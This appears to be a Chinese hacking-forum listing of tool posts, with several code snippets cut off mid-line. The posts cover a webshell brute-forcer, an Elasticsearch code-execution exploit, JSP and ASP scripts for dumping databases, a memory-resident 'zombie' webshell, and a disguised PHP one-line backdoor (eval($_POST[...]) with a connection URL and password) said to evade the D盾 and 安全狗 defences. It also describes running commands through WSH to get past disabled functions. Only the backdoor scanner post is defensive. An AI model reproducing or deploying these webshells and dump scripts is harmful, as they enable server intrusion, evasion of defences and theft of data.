webshell爆破工具

需要安装。net2.0 爆破速度还算可以。

Elasticsearch 代码执行漏洞利用工具

JSP wget脱裤脚本

存在依赖问题,比如tomcat下需要有oralce jdbc,我测试换的环境是oracle 10g,JDBC是classes12.jar,需要将它放到tomcat目录的common\lib下面。

java不太熟悉,听说可以利用反射方式解决依赖包问题。稍后我再研究研究,这里发出两个版本,一个是mysql的,一个是oracle的。

Mysql版本:

<%@ page contentType="text/html; charset=utf-8" %>
<%@ page language="java" %>
<%@ page imp

ASP wget脱裤脚本

看了不少人写的各种拖库脚本,什么php的、asp的呀,都基本上是有权限的备份,没权限的一条一条导,用程序去再写到文本里。如果用浏览器去执行你的脱库脚本,还是累了。其实我们用wget就可以了,这样就so easy,妈妈再也不担心你的拖库了。

asp拖mssql的库的脚本和用法示例如下:

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001" %>'这里改编码方式
<%
'用法:如果把本程序放在[url]http://www.xxx.com/sql.asp[/ur

完美扫描PHP特殊一句话后门

<?php 
/**********************
作者 Spider
网上公布的各种PHP后门全军覆没
针对一些特殊变形的后门需要自己添加特征
误报率不到百分之一
**********************/
error_reporting(E_ERROR);
ini_set('max_execution_time',20000);
ini_set('memory_limit','512M');
header("content-Type: text/html; charset=gb2312");

$matches = array(
        &#3

永不被删除的僵尸版一句话菜刀

这款工具我不知道别的地方有没有 也不知道别人有没有做出来 但是对于我来说应该是属于原创的因为这个东西是我一个朋友 猫猫弄出来的东西所以我把它定义为原创的东西。

如果大神们有什么意见可以随意吐槽 如果谁要转载也请注明下原创作者 原作者是 猫猫

先简单介绍下原理:

大家都知道一般web的服务器基本上是很难得回去重启的 尤其是一些大型的web服务器 那么这就说明了一个问题 这些服务器的内存是永远不会清理的

好的 既然知道这些服务器的内存基本能难清理一次那么我就可以根据这一点把我们的一句话写进去

完美过D盾,安全狗的php一句话

本团队在友情检测某站时发现

无论是代码还是注释极具迷惑性

文件名称为:admin_list.php

连接方式:http://www.expdoor.com/?list=eval($_POST[expdoor]);

密码:expdoor


以下为引用代码->

<?php
/*
*
*文章列表生成文件
*/
if(isset($_GET['list'])){
   mud();
}
function mud(){
$fp=fopen('content_batch_stye.html','w');
file_put_contents('content_batch_stye.html&

php利用wsh以及Shell.Application执行命令

php利用wsh突破函数禁用执行命令(安全模式同理) - 专注网络安全! N* Y; Q7 r( ~) v, V* ^  u